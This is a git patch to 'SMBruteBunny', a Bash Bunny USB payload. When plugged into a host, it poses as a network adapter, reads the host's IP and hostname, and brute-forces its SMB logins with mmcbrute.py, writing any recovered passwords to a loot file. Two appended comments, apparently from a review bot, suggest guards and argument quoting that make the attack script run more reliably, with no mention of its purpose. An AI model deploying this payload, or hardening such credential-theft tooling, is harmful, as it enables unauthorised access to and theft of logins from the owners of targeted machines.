From 3980bab638649148558000e46efffde67374f7a0 Mon Sep 17 00:00:00 2001
From: "Mohamed A. Baset"
Date: Sat, 1 Jun 2019 02:22:45 -0500
Subject: [PATCH] Critical fixes I really missed the BB's original variable "$SWITCH_POSITION" since in my testing BB's payload I'm maintaining it in my code as: ORIGINAL_SWITCH="/root/udisk/payloads/$SWITCH_POSITION" Thanks to @catatonicprime for offering the fix for this issue.
---
 .../library/credentials/SMBruteBunny/payload.txt | 16 +++++++++-------
 1 file changed, 9 insertions(+), 7 deletions(-)
diff --git a/payloads/library/credentials/SMBruteBunny/payload.txt b/payloads/library/credentials/SMBruteBunny/payload.txt
index 4a1c9010..39489bb7 100644
--- a/payloads/library/credentials/SMBruteBunny/payload.txt
+++ b/payloads/library/credentials/SMBruteBunny/payload.txt
@@ -4,16 +4,18 @@
 # Author: Mohamed A. Baset (@SymbianSyMoh)
 # PS: This is the shittiest bash script you'll ever see :D
-password_process_file="$ORIGINAL_SWITCH/ppf.txt"
-password_loot_file="$ORIGINAL_SWITCH/credentials.txt"
-user_bruteforce_list="$ORIGINAL_SWITCH/userlist.txt"
-pass_bruteforce_list="$ORIGINAL_SWITCH/passlist.txt"
-
 # Setup
 LED SETUP
 CUCUMBER PLAID
-ATTACKMODE HID RNDIS_ETHERNET
 mount /dev/nandf /root/udisk/
+GET SWITCH_POSITION
+BBSWITCH="/root/udisk/payloads/$SWITCH_POSITION"
+password_process_file="$BBSWITCH/ppf.txt"
+password_loot_file="$BBSWITCH/credentials.txt"
+user_bruteforce_list="$BBSWITCH/userlist.txt"
+pass_bruteforce_list="$BBSWITCH/passlist.txt"
+mmcbrute_path="$BBSWITCH/mmcbrute"
+ATTACKMODE HID RNDIS_ETHERNET
 GET TARGET_IP
 GET TARGET_HOSTNAME
@@ -23,7 +25,7 @@ echo $TARGET_HOSTNAME >> $pass_bruteforce_list
 # Perform SMB bruteforce attack
 LED STAGE1
-python $ORIGINAL_SWITCH/mmcbrute/mmcbrute.py -t $TARGET_IP -u $user_bruteforce_list -p $pass_bruteforce_list 2> $password_process_file
+python $mmcbrute_path/mmcbrute.py -t $TARGET_IP -u $user_bruteforce_list -p $pass_bruteforce_list 2> $password_process_file
 # Check for results
 LED STAGE2
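Review bot: In the first hunk (`@@ -4,16 +4,18 @@`), the `$BBSWITCH` paths are derived straight after `mount /dev/nandf /root/udisk/` and `GET SWITCH_POSITION` with no check that either step succeeded. If `SWITCH_POSITION` comes back empty, every derived path silently becomes `/root/udisk/payloads//…`. If the mount failed, the later redirections would presumably land in the bare mountpoint directory instead of the udisk partition. A guard right after the GET, such as `[ -n "$SWITCH_POSITION" ] || exit 1`, would make that failure visible. A short comment such as `# paths depend on SWITCH_POSITION, so they must be set after mount and GET` would also record why the assignments moved; the rest of the script lies outside the hunk.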
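Review bot: The rewritten `python` line in the second hunk (`@@ -23,7 +25,7 @@`) still expands every variable unquoted, so any path or `TARGET_IP` value containing whitespace or glob characters is word-split or expanded before mmcbrute.py receives it. Quoting each expansion keeps the arguments intact: `python "$mmcbrute_path/mmcbrute.py" -t "$TARGET_IP" -u "$user_bruteforce_list" -p "$pass_bruteforce_list" 2> "$password_process_file"`. The `echo $TARGET_HOSTNAME >> $pass_bruteforce_list` line visible in the hunk header follows the same unquoted pattern, and its value presumably originates from the attached host, so it deserves the same treatment. The script continues past the end of the hunk.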